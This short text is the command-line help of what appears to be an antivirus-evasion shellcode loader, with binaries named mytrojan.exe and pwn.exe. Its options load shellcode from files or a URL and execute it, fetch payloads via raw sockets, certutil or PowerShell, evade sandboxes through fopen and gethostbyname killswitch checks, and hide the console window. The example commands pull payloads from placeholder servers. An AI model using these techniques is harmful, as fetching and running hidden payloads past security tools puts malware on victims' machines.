-l load and exec shellcode from given file, call is with mytrojan.exe myshellcode.bin
when called with -E call with mytrojan.exe shellcode.txt
-f compile shellcode into .exe, needs filename of shellcode file
-u load and exec shellcode from url using internet explorer (url is compiled into executable)
-d download the shellcode file using different techniques
-d sock -> for downloading a raw shellcode via http in memory and exec (no overhead, use socket)
usage example: pwn.exe http://yourserver/yourpayload.bin
-d certutil -> use certutil.exe for downloading the file
-d powershell -> use powershell for downloading the file
usage of -d certutil/powershell in combination with -f
for executing the raw shellcode after downloading
call: pwn thepayload.bin http://server/thepayload.bin
-E use avets ASCII encryption, often this does not have to be used
Can be used with -l
-F use fopen sandbox evasion
-k "killswitch" sandbox evasion with gethostbyname
-X compile for 64 bit
-p print debug information
-q quiet mode (hide console window)
-h help